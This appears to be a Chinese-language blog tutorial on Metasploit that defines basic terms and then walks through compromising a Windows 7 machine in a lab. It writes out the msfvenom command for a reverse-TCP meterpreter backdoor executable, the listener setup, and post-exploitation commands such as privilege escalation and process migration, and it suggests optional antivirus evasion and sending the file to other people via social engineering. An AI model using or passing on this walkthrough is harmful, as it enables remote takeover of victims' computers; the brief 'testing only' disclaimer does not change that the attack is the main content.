標籤:技術 nbsp size OLE 網路連接 asp 開源 產生 二次
註:只是測試,不可幹違法的事。
一、metaspolit工具的介紹
- 1.1、metaspolit 是一款開源安全性漏洞偵查工具,附帶數百個已知的軟體漏洞,並保持頻繁更新。被安全社區冠以“可以黑掉整個宇宙”之名的強大滲透測試架構。
- 1.2、Metasploit是一款開源的安全性漏洞偵查工具,同時Metasploit是免費的工具,因此安全工作人員常用Metasploit工具來檢測系統的安全性。
- 1.3、Metasploit Framework (MSF) 在2003年以開放源碼方式發布,是可以自由擷取的開發架構。它是一個強大的開源平台,供開發,測試和使用惡意代碼,這個環境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠 平台
- 1.4、這種可以擴充的模型將負載控制(payload)、編碼器(encode)、無操作產生器(nops)和漏洞整合在一起,使 Metasploit Framework 成為一種研究高危漏洞的途徑。它整合了各平台上常見的溢出漏洞和流行的 shellcode 並且不斷更新。
二、專業術語
- 滲透測試(Exploit):指由攻擊者或滲透測試者利用一個系統、應用或服務中的安全性漏洞,所進行的攻擊行為。能夠進行攻擊並得到目標系統控制權的惡意代碼。經典的exploit由payload和injector(注入程式)組成,payload負責取得系統的控制權,而注入程式負責將payload注射到相應的有漏洞的系統中;
- 攻擊載荷(Payload):是我們期望目標系統在被滲透攻擊之後執行的代碼。其實就是廣義上的Shellcode,被翻譯為‘有效載荷’
- shellcode ::攻擊程式的核心代碼,能夠取得系統的攻擊權,一把是取得一個shell。是在滲透攻擊時作為攻擊載荷啟動並執行一組機器指令,通常用組合語言編寫。injector:相對shellcode來說,它實現載入和發送shellcode,提供返回地址等功能;
- 模組(Module):指Metaspolit架構中所使用的一段軟體程式碼群組件,可用於發起滲透攻擊或者行某些輔助攻擊。
- auxiliary
- encoders
- exploits
- nops
- payloads
- post
- 監聽器(Listener):是metaspolit中用來等待網路連接的組件。
二、metaspolit工具的簡單使用
三、小實驗:利用metaspolit工具滲透win7電腦
流程如下:
1、使用工具:kail Linux 系統(IP:192.168.31.54)
win7 系統(IP:192.168.31.136)
2、步驟:
1、首先在kali上製作一個後門程式。檔案名稱為:openme.exe 命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.54 LPORT=5050 -f exe -o setup.exe #本地監聽地址及連接埠號碼:192.168.31.54:5050 2、為產生的檔案 openme.exe 賦予可執行檔許可權,如果有必要可以對該檔案執行免殺 命令: chmod 777 openme.exe 3、開啟msf,載入exploit/multi/handler模組,同時設定本地主機地址,本地連接埠 命令:msfconsole msf > use exploit/multi/handler msf exploit(handler) > set lhost 192.168.31.54 msf exploit(handler) > set lport 5050 4、開始執行滲透攻擊並監聽 命令: msf exploit(handler) > exploit -z -j 5、此時,你可以將檔案發給其他人,利用社交工程學知識讓別人在他的win7系統上開啟該檔案,那麼你的目的就達到了 6、後門程式反向串連到msf,msf發起第二次攻擊(開始滲透),然後用戶端(後門程式)串連到服務端(msf)。 你在你kali上會有一個session。你攻陷了別人的主機並拿到了shell,還有session資訊。 命令: msf exploit(handler) > sessions msf exploit(handler) > sessions -i 1 meterpreter > shell 7、入侵成功之後可操作win7電腦 getsystem #會自動利用各種各樣的系統漏洞來進行許可權提升 migrate #進程id進程遷移 background #把當前的會話設定為背景,需要的時候在啟用 getuid #查看對方正在啟動並執行使用者 ps #列出所有的進程 getpid #返回運行meterpreter的id號 sysinfo #產看系統資訊和體繫結構 shell #切換到cmd的系統許可權方式
3、運行結果
查看本地的IP
用msfvenom產生exe檔案
啟動metaspolit
設定本地IP地址和連接埠並且攻擊
當對方開啟exe檔案的時候,會產生一個session會話,如所示
現在就可以操作別人電腦了,如:
kail linux 系統下利用metaspolit工具滲透win7電腦